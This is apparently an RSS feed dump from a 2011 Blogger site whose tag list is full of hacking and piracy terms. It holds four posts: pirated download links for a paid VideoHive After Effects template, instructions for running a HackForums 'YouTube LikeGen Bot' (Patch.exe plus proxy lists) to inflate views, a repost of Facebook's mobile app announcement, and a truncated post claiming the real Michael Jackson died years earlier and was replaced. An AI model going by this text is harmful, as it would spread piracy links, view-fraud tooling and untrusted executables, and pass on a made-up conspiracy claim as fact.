<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-6804681555637047946</atom:id><lastBuildDate>Mon, 28 Nov 2011 00:42:23 +0000</lastBuildDate><category>spanish</category><category>solution</category><category>news</category><category>bug</category><category>eden</category><category>vulnerability</category><category>sand</category><category>device</category><category>strategy</category><category>cheap</category><category>gauranteed</category><category>on</category><category>Dark</category><category>analytics</category><category>. information</category><category>make</category><category>daily</category><category>quick</category><category>crysis</category><category>not</category><category>buxism</category><category>Laptop</category><category>evil</category><category>tarrif</category><category>exchange</category><category>bewafai</category><category>fraud</category><category>sort</category><category>facebook</category><category>Age</category><category>reality</category><category>Prince of Persia</category><category>RBI</category><category>ISD</category><category>700</category><category>leak</category><category>Mode</category><category>uncover</category><category>modded</category><category>zero</category><category>networking</category><category>album</category><category>vlc</category><category>CS5</category><category>amount</category><category>SNIFFING</category><category>940</category><category>compatibility</category><category>desktop</category><category>Pricing</category><category>mac</category><category>unable</category><category>mp3</category><category>Local</category><category>Prince</category><category>bud</category><category>spoiler</category><category>Tasty</category><category>neobux</category><category>Origins</category><category>GPRS</category><category>cooking</category><category>tango</category><category>approve</category><category>best</category><category>Review</category><category>badonga</category><category>iso</category><category>revostock</category><category>4890</category><category>hacking</category><category>Sands</category><category>password. username</category><category>vertex</category><category>application</category><category>Router</category><category>ebook</category><category>mp4</category><category>track</category><category>buffer</category><category>appropriate</category><category>gifts</category><category>limited</category><category>Adobe Premiere</category><category>start</category><category>sasori</category><category>Hide</category><category>course</category><category>codec</category><category>Cyrus</category><category>services</category><category>nfs</category><category>code</category><category>hack</category><category>exam</category><category>arts</category><category>bot</category><category>spice</category><category>check</category><category>Millennium</category><category>ago</category><category>noob</category><category>miley</category><category>alien</category><category>$37</category><category>click</category><category>company</category><category>meta</category><category>transfer</category><category>present</category><category>Area</category><category>.com</category><category>investment</category><category>log</category><category>ethical</category><category>hot</category><category>Bell</category><category>answer</category><category>beginner</category><category>master</category><category>hotfile</category><category>mobile</category><category>Kaspersky</category><category>tangy</category><category>bussiness</category><category>finding</category><category>blogspot</category><category>ADSL</category><category>Upgrade Wordpress to Wordpress 3.0 Beta 1</category><category>relationships</category><category>sneak peak</category><category>method</category><category>how</category><category>noodles</category><category>Photoshop</category><category>Flash</category><category>netspend</category><category>After Effects</category><category>professional</category><category>activation</category><category>y2k</category><category>xml</category><category>indian</category><category>promotional</category><category>transition</category><category>from</category><category>resident</category><category>Pure</category><category>owner</category><category>Select</category><category>Forgotten</category><category>scan</category><category>blur</category><category>style</category><category>x3100</category><category>WEP</category><category>fuel</category><category>fast. gandi</category><category>android</category><category>hacked</category><category>theft</category><category>credits</category><category>try</category><category>GTA</category><category>software</category><category>ninja</category><category>messages</category><category>editing</category><category>ownload</category><category>release</category><category>system time</category><category>verify</category><category>generation</category><category>century</category><category>bit</category><category>users</category><category>yahoo</category><category>g31</category><category>operating</category><category>dual</category><category>reduced</category><category>fast</category><category>Compress</category><category>blood</category><category>crack</category><category>beliefs</category><category>Dragon</category><category>help</category><category>S.T.A.L.K.E.R.</category><category>spoofing</category><category>File</category><category>download</category><category>archive</category><category>Stats</category><category>amazon</category><category>Frontlines</category><category>windows</category><category>funds</category><category>christ</category><category>jackson</category><category>bypass</category><category>addon</category><category>man</category><category>twiends</category><category>sharing</category><category>singles</category><category>key</category><category>old</category><category>Ratio</category><category>process</category><category>modem</category><category>Persia</category><category>card</category><category>2010</category><category>drake bell</category><category>employee</category><category>website</category><category>miss</category><category>GB</category><category>life</category><category>wi-fi</category><category>spoof</category><category>source</category><category>captcha</category><category>running</category><category>activated</category><category>redeem. failure</category><category>features</category><category>omlette</category><category>article</category><category>supports</category><category>scandal</category><category>failure</category><category>avg</category><category>very</category><category>graphic</category><category>dollors</category><category>bugs</category><category>hex</category><category>death</category><category>floor</category><category>kathy</category><category>ashish</category><category>prepaid</category><category>lyrics</category><category>chrome</category><category>Friend</category><category>end</category><category>truth</category><category>module</category><category>maggi</category><category>copy</category><category>gma</category><category>virtual</category><category>Vanessa</category><category>tryout</category><category>jee</category><category>past</category><category>CS</category><category>system</category><category>Feature</category><category>price</category><category>workshop</category><category>secrets</category><category>creed</category><category>easily</category><category>bollywood</category><category>Into</category><category>Affecting</category><category>4350</category><category>youngistan</category><category>record</category><category>Compression</category><category>Highlight</category><category>puppet</category><category>amazing</category><category>controller</category><category>march</category><category>report</category><category>wifi. wi</category><category>text</category><category>dns</category><category>pain</category><category>300MB</category><category>Arkham</category><category>Portrait</category><category>making</category><category>profit</category><category>error</category><category>account</category><category>Unix</category><category>advertize</category><category>.info</category><category>significance</category><category>skills</category><category>readbud</category><category>recharge</category><category>magic</category><category>entry</category><category>folder</category><category>sony</category><category>explorer</category><category>detect</category><category>act</category><category>low</category><category>surgery</category><category>3g</category><category>interface</category><category>Shell</category><category>invalid</category><category>year</category><category>10</category><category>Artist</category><category>around</category><category>assassin</category><category>hd</category><category>diva</category><category>Efron</category><category>matware</category><category>learning</category><category>lappy</category><category>2</category><category>legit</category><category>VIDEOHIVE</category><category>180162</category><category>channel</category><category>starter</category><category>Office</category><category>number</category><category>awesome</category><category>sqli</category><category>bella</category><category>Premium</category><category>steal</category><category>high</category><category>Prototype</category><category>avaited</category><category>refer</category><category>post</category><category>Relations</category><category>1</category><category>paypal</category><category>satelite</category><category>caller</category><category>listen</category><category>free movies</category><category>followers</category><category>undetectable</category><category>Launches</category><category>Superstars</category><category>sad</category><category>4</category><category>3d</category><category>likes</category><category>hillary duff</category><category>date</category><category>eggs</category><category>insert</category><category>home</category><category>firefox</category><category>confirm</category><category>Tagging</category><category>billion</category><category>cpanel</category><category>Beta</category><category>link</category><category>3</category><category>drake josh</category><category>edward</category><category>Planet</category><category>changes</category><category>advertise</category><category>wallpapers</category><category>security</category><category>Corporate</category><category>gsm</category><category>banned</category><category>game</category><category>new codes</category><category>details</category><category>latest</category><category>movie</category><category>hidden</category><category>metaspoilt</category><category>Upgrade</category><category>footage</category><category>plan</category><category>5</category><category>Drake</category><category>With</category><category>media</category><category>h264</category><category>myth</category><category>wiki</category><category>zac</category><category>Template</category><category>full</category><category>advertizing</category><category>7</category><category>telecom</category><category>kool</category><category>unknown</category><category>X4</category><category>Forgery</category><category>betray</category><category>real</category><category>for</category><category>altair</category><category>address</category><category>picture</category><category>CEO</category><category>domain</category><category>layout</category><category>freeola</category><category>costomize</category><category>gandi</category><category>MB</category><category>solomon</category><category>budget</category><category>years</category><category>programming</category><category>simple</category><category>mediafire</category><category>james</category><category>ghost</category><category>config</category><category>learn</category><category>wap</category><category>9</category><category>saya</category><category>without</category><category>updated</category><category>ulimited</category><category>languages</category><category>8</category><category>improved</category><category>Cross</category><category>Need</category><category>Tricks</category><category>password</category><category>prompt</category><category>naruto</category><category>nightmare</category><category>adobe</category><category>cookie</category><category>ip</category><category>snack</category><category>you</category><category>revieled</category><category>wall</category><category>no</category><category>vulnerable</category><category>Effects</category><category>Vancouver</category><category>keylogger</category><category>motive</category><category>email</category><category>racing</category><category>username</category><category>the</category><category>myspace</category><category>bsnl</category><category>fbml</category><category>protection</category><category>KB971033</category><category>February</category><category>next</category><category>redeem</category><category>errer</category><category>attack</category><category>entrance</category><category>Does</category><category>Call of Pripyat</category><category>engineering</category><category>graphics</category><category>SP1</category><category>at</category><category>more</category><category>IV</category><category>unlimited</category><category>touching</category><category>UK</category><category>page</category><category>IIT</category><category>drivers</category><category>large</category><category>payment</category><category>fix</category><category>statistics</category><category>disable</category><category>step</category><category>notification</category><category>Site</category><category>1800</category><category>google</category><category>soupy</category><category>space</category><category>Backtracking</category><category>Hudgens</category><category>designer</category><category>technology</category><category>domains</category><category>jacking</category><category>smart</category><category>iframe</category><category>Rs.</category><category>glasses</category><category>birth</category><category>marking</category><category>predator</category><category>trojon</category><category>survey</category><category>pepsi</category><category>strong</category><category>moves</category><category>extreme</category><category>mix</category><category>nitro</category><category>sent</category><category>Batch</category><category>image</category><category>India</category><category>Gallery</category><category>earnings</category><category>Network</category><category>generators</category><category>hatred</category><category>optimize</category><category>engine</category><category>War</category><category>premiere</category><category>files</category><category>music</category><category>who</category><category>kitchen</category><category>everything</category><category>gnail</category><category>stay</category><category>cool</category><category>phishing</category><category>ingredients</category><category>scrambled</category><category>trick</category><category>twitter</category><category>virus</category><category>YouTube Video</category><category>fool</category><category>66393</category><category>is</category><category>plus</category><category>hits</category><category>Wordpress</category><category>avatar</category><category>any</category><category>senses</category><category>experts</category><category>phone</category><category>norton</category><category>DvDrip</category><category>side</category><category>applications</category><category>keygen</category><category>ati</category><category>Creative</category><category>credit</category><category>top</category><category>generate</category><category>emails</category><category>serial</category><category>SMS</category><category>A</category><category>seven</category><category>50</category><category>woldwide</category><category>tracking</category><category>semi</category><category>Forgotten Sands</category><category>smartphone</category><category>working</category><category>important</category><category>intel</category><category>3100</category><category>vegetables</category><category>tweet</category><category>payout</category><category>off</category><category>Lockerz</category><category>Free</category><category>requirements</category><category>xp. new</category><category>revenue</category><category>exploit</category><category>namezone</category><category>remove</category><category>OS</category><category>articles</category><category>OEM</category><category>secret</category><category>songs</category><category>javascript</category><category>remebering</category><category>change</category><category>fraps</category><category>social</category><category>RAM</category><category>switch</category><category>foreign</category><category>Government</category><category>sharecash</category><category>delete</category><category>michael</category><category>niche. error</category><category>ptz</category><category>awaited</category><category>browser</category><category>cut</category><category>bewafayi</category><category>open</category><category>accounts</category><category>solve</category><category>Injection</category><category>crash</category><category>idea</category><category>tool</category><category>Way</category><category>views</category><category>broadband</category><category>mass</category><category>games</category><category>Released</category><category>instant</category><category>rate</category><category>Port</category><category>day</category><category>antivirus</category><category>blogger</category><category>call</category><category>megaupload</category><category>solved</category><category>search</category><category>cell.</category><category>anime</category><category>Time</category><category>Prison</category><category>traffic</category><category>clean</category><category>keywords</category><category>1600</category><category>Y2K38</category><category>cpc</category><category>live</category><category>movies</category><category>audible</category><category>small</category><category>malware</category><category>Photo</category><category>void</category><category>hash</category><category>Phenom</category><category>hosting</category><category>info</category><category>add-on</category><category>service</category><category>Request</category><category>e-book</category><category>teri. deep</category><category>direct</category><category>player</category><category>spam</category><category>BATMAN</category><category>video</category><category>motherboard</category><category>million. download</category><category>640</category><category>cameron</category><category>to</category><category>centre</category><category>cpa</category><category>rich</category><category>success</category><category>cd</category><category>STUDY</category><category>format</category><category>international</category><category>memory</category><category>died</category><category>lovely</category><category>Challenge</category><category>akashdirect</category><category>selection</category><category>increase</category><category>cngineer</category><category>epic</category><category>love</category><category>must</category><category>points</category><category>joint</category><category>Easy</category><category>50000</category><category>secure</category><category>song</category><category>tag</category><category>trusted</category><category>command</category><category>Tutorials</category><category>breat</category><category>New</category><category>Videos</category><category>swagbucks</category><category>vegas</category><category>institute</category><category>Ultimate</category><category>anti</category><category>Links</category><category>twilight</category><category>Asylum</category><category>spyware</category><category>AMD</category><category>access</category><category>offer</category><category>2038</category><category>nuke</category><category>ethernet</category><category>5gbps</category><category>tastemaker</category><category>speed</category><category>spamming</category><category>basic</category><category>orkut</category><category>login</category><category>tours</category><category>Project</category><category>income</category><category>cell</category><category>III</category><category>EXE</category><category>recipe</category><category>arrange</category><category>fan</category><category>adsense</category><category>cash</category><category>id</category><category>videos amazing</category><category>Creates</category><category>Television</category><category>run</category><category>ubantu</category><category>problem</category><category>Animes</category><category>suite</category><category>SQL</category><category>lan</category><category>hotel</category><category>Changing</category><category>registry</category><category>ads</category><category>JPG</category><category>CPM</category><category>rapidshare</category><category>settings</category><category>MyBB</category><category>goldamith</category><category>are</category><category>Web</category><category>World</category><category>cousine</category><category>egg</category><category>powers</category><category>PC</category><category>lead</category><category>and</category><category>get</category><category>trial</category><category>vanessa hudgens</category><category>shocking</category><category>Earn</category><category>TV</category><category>business</category><category>cdma</category><category>efficient</category><category>manage</category><category>follow</category><category>beware</category><category>wanted</category><category>radeon</category><category>mtnl</category><category>html</category><category>coding</category><category>blood+</category><category>screenshot</category><category>pritam</category><category>nice</category><category>vista</category><category>Pack</category><category>sandbox</category><category>spyt  ringtone</category><category>url</category><category>proxy</category><category>buffering</category><category>admin</category><category>auto</category><category>XP</category><category>eicar</category><category>multiplayer</category><category>mirror</category><category>all</category><category>dot</category><category>Vodafone</category><category>USA</category><category>most</category><category>string</category><category>codes</category><category>shame</category><category>shortener</category><category>bank</category><category>helper</category><category>one</category><category>internet</category><category>database</category><category>telephone</category><category>Retail</category><category>linux</category><category>tech</category><category>Editable</category><category>convert</category><category>tutorial</category><category>Wonderfull</category><category>safe</category><category>break</category><category>pays</category><category>blog</category><category>DTH</category><category>redemption</category><category>linkgen</category><category>food</category><category>3.0</category><category>god</category><category>microsoft</category><category>480</category><category>money</category><category>profile</category><title>Arena of An Artist</title><description>A blog for complete resources for every computer user...</description><link>http://www.ashisharena.com/</link><managingEditor>noreply@blogger.com (ArtistAshish)</managingEditor><generator>Blogger</generator><openSearch:totalResults>149</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/ashisharena/adCx" /><feedburner:info uri="ashisharena/adcx" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-2846379128951917795</guid><pubDate>Sun, 17 Jul 2011 10:02:00 +0000</pubDate><atom:updated>2011-07-17T03:02:43.862-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Template</category><category domain="http://www.blogger.com/atom/ns#">Project</category><category domain="http://www.blogger.com/atom/ns#">reality</category><category domain="http://www.blogger.com/atom/ns#">epic</category><category domain="http://www.blogger.com/atom/ns#">CS5</category><category domain="http://www.blogger.com/atom/ns#">Free</category><category domain="http://www.blogger.com/atom/ns#">Links</category><category domain="http://www.blogger.com/atom/ns#">File</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">download</category><category domain="http://www.blogger.com/atom/ns#">dual</category><category domain="http://www.blogger.com/atom/ns#">VIDEOHIVE</category><category domain="http://www.blogger.com/atom/ns#">mirror</category><category domain="http://www.blogger.com/atom/ns#">music</category><category domain="http://www.blogger.com/atom/ns#">adobe</category><category domain="http://www.blogger.com/atom/ns#">180162</category><title>VideoHive Dual Reality 180162 After Effects Project Template Download</title><description>&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;VideoHive Dual Reality 180162&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;After Effects Project Template Download&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;&lt;b&gt;Award Winning Project!&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://s3.envato.com/files/2002761/dual-reality-still.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://s3.envato.com/files/2002761/dual-reality-still.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;Demo:&lt;/b&gt; &lt;a href="http://videohive.net/item/dual-reality/180162"&gt;http://videohive.net/item/dual-reality/180162&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;hr /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;u&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;DOWNLOAD HERE&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;Part 1&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;http://www.multiupload.com/96B950KSPY&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Part 2 &lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;http://www.multiupload.com/1CWVQ7DXZJ&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;&lt;span style="font-size: x-large;"&gt;ENJOY..!&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-2846379128951917795?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KjmXfCVCl1C4ny878Sx4tyEXUYg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KjmXfCVCl1C4ny878Sx4tyEXUYg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KjmXfCVCl1C4ny878Sx4tyEXUYg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KjmXfCVCl1C4ny878Sx4tyEXUYg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/PrTQe0Aezno" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/PrTQe0Aezno/videohive-dual-reality-180162-after.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>1</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/07/videohive-dual-reality-180162-after.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-6701409556239138631</guid><pubDate>Sun, 17 Jul 2011 07:17:00 +0000</pubDate><atom:updated>2011-07-17T00:17:08.826-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">YouTube Video</category><category domain="http://www.blogger.com/atom/ns#">videos amazing</category><category domain="http://www.blogger.com/atom/ns#">increase</category><category domain="http://www.blogger.com/atom/ns#">bit</category><category domain="http://www.blogger.com/atom/ns#">linkgen</category><category domain="http://www.blogger.com/atom/ns#">views</category><title>Youtube LikeGen Bot ( INCREASE YOUTUBE VIEWS )</title><description>&lt;span style="color: red;"&gt;&lt;b&gt;Hello ! &lt;br /&gt;I just found this bot in &lt;span style="color: #008400;"&gt;HackForums&lt;/span&gt;&lt;br /&gt;It uses proxies to get views for YouTube videos .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Download Link : &lt;a href="http://filecious.com/download/64/YoutubeViewr.rar.html"&gt;YoutubeViewer&lt;/a&gt;&lt;span style="color: blue;"&gt;&lt;br /&gt;Instructions :&lt;br /&gt;&lt;span style="color: #008400;"&gt;&lt;br /&gt;1.Extract the Rar file .&lt;br /&gt;2.Run Patch.exe&lt;br /&gt;3.Run Youtube Viewer V3!.exe&lt;br /&gt;4.Load proxy list (provided in the rar) you can get more by googling.&lt;br /&gt;5.Click on Start and wait :)&lt;br /&gt;&lt;br /&gt;Note : Dont Change any other value&lt;br /&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;&lt;br /&gt;Screenshot :&lt;br /&gt;http://imgsrc.in/?v=youtube.png&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Happy Youtubing :)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-6701409556239138631?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/GZYWV5iMyqksmeKhEqdFPwQlXMA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GZYWV5iMyqksmeKhEqdFPwQlXMA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/GZYWV5iMyqksmeKhEqdFPwQlXMA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GZYWV5iMyqksmeKhEqdFPwQlXMA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/KQsy3nwH4eo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/KQsy3nwH4eo/youtube-likegen-bot-increase-youtube.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/07/youtube-likegen-bot-increase-youtube.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-1726433198571027535</guid><pubDate>Sun, 17 Jul 2011 07:11:00 +0000</pubDate><atom:updated>2011-07-17T00:11:45.352-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">application</category><category domain="http://www.blogger.com/atom/ns#">mobile</category><category domain="http://www.blogger.com/atom/ns#">idea</category><category domain="http://www.blogger.com/atom/ns#">GPRS</category><category domain="http://www.blogger.com/atom/ns#">smartphone</category><category domain="http://www.blogger.com/atom/ns#">cell.</category><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">New</category><category domain="http://www.blogger.com/atom/ns#">any</category><title>Download New Facebook App And Enjoy Facebook on any Mobile Phone</title><description>At  Facebook, we work to ensure people around the world have a great   Facebook experience no matter where they are or how they access our   site.&lt;br /&gt;&lt;br /&gt;Today,  we're launching the new Facebook for Every  Phone app, which offers a  fast and comprehensive Facebook experience on  over 2,500 different  phones. This app not only includes Facebook’s  most popular features,  such as News Feed, Inbox, and Photos, but also  enables you to upload  photos and find friends from your phone’s  contacts.&amp;nbsp; People all over the world can download the app by visiting &lt;a href="http://www.facebook.com/notes/facebook-mobile/facebook-for-every-phone/m.facebook.com"&gt;m.facebook.com&lt;/a&gt; and scrolling down to the download link, or by entering &lt;a href="http://www.facebook.com/notes/facebook-mobile/facebook-for-every-phone/d.facebook.com/install"&gt;d.facebook.com/install&lt;/a&gt; directly into their mobile browser. You can also find it in leading app stores, including &lt;a href="http://www.facebook.com/getjarapp"&gt;GetJar&lt;/a&gt;,  &lt;a href="http://www.facebook.com/Appia.Inc"&gt;Appia&lt;/a&gt;,  and   Mobile Weaver.&lt;br /&gt;&lt;br /&gt;&lt;span class=""&gt;&lt;img alt="" class="photo_img img" src="http://a6.sphotos.ak.fbcdn.net/hphotos-ak-snc6/270715_10150325150094009_234232874008_9391176_7435776_n.jpg" /&gt;&lt;span class="caption"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;We   also want to make sure the Facebook for Every Phone app is affordable   to try and use, which is why we’ve collaborated with many carriers   worldwide (see list below) to offer you free data access to this app for   90 days. This experience is optimized to use less data than other Java   apps or mobile sites, making it much more affordable for people to use   when the 90-day period ends.&lt;br /&gt;&lt;br /&gt;The  Facebook for Every  Phone app will be available globally on Java-enabled  phones starting  today, and we are working on making the app compatible  with even more  handsets in the future.&lt;br /&gt;&lt;br /&gt;With  one easy download of this  app, get all of what Facebook has to offer on  your mobile device so you  can stay connected with your family and  friends wherever you are. For  more information on how to download and  use this application, you can  check out the video below.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.facebook.com/video/video.php?v=10150312228478109"&gt;&lt;span class=""&gt;&lt;img alt="" class="photo_img img" src="http://a1.sphotos.ak.fbcdn.net/hphotos-ak-snc6/262115_10150325137424009_234232874008_9390962_6085044_n.jpg" /&gt;&lt;span class="caption"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Carriers offering free data access for a limited time:&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Aircel (India)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Airtel (India)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Banglalink (Bangladesh)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Beeline (Russia)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Celcom (Malaysia)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Etisalat (Egypt, Nigeria)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Globe (Philippines)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Idea (India)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;O2 Telefonica (Germany)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Reliance (India)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Smart (Philippines)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Smartfren (Indonesia)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Telkomsel (Indonesia)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Three (Indonesia, United Kingdom)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;TIM (Brazil)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;TMN (Portugal)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Ufone (Pakistan)&lt;br /&gt;• &amp;nbsp;&amp;nbsp;Vodafone (Turkey)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-1726433198571027535?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/8BQicDCJm4UX0OQ77AQ-_WuVO4g/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/8BQicDCJm4UX0OQ77AQ-_WuVO4g/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/8BQicDCJm4UX0OQ77AQ-_WuVO4g/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/8BQicDCJm4UX0OQ77AQ-_WuVO4g/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/KNPvcQC7X7w" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/KNPvcQC7X7w/download-new-facebook-app-and-enjoy.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>1</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/07/download-new-facebook-app-and-enjoy.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-6127794371052849648</guid><pubDate>Tue, 15 Mar 2011 10:35:00 +0000</pubDate><atom:updated>2011-03-15T03:35:12.618-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">years</category><category domain="http://www.blogger.com/atom/ns#">video</category><category domain="http://www.blogger.com/atom/ns#">scandal</category><category domain="http://www.blogger.com/atom/ns#">jackson</category><category domain="http://www.blogger.com/atom/ns#">michael</category><category domain="http://www.blogger.com/atom/ns#">died</category><category domain="http://www.blogger.com/atom/ns#">truth</category><category domain="http://www.blogger.com/atom/ns#">10</category><category domain="http://www.blogger.com/atom/ns#">shocking</category><category domain="http://www.blogger.com/atom/ns#">footage</category><category domain="http://www.blogger.com/atom/ns#">ago</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">hidden</category><category domain="http://www.blogger.com/atom/ns#">surgery</category><title>Real Michael Jackson Died 10 Years Ago- This Shocking Video Confirms it</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;Video Confirming the Truth of Michael Jackson.&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp; The Real Michael Jackson Died 10 Years Ago During one of his Secret Surgeries. The Person impersonating him after that was just a puppet of big music hot shots who earned hell lot Money after that. Finally that person was also declared dead and people made a lot of money by that also.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;Watch this video to see the Truth...&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://lh3.googleusercontent.com/-Fty2BEoyUog/TX89skQhR4I/AAAAAAAAA7Q/PlRyWOe_K4I/s1600/mj.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" 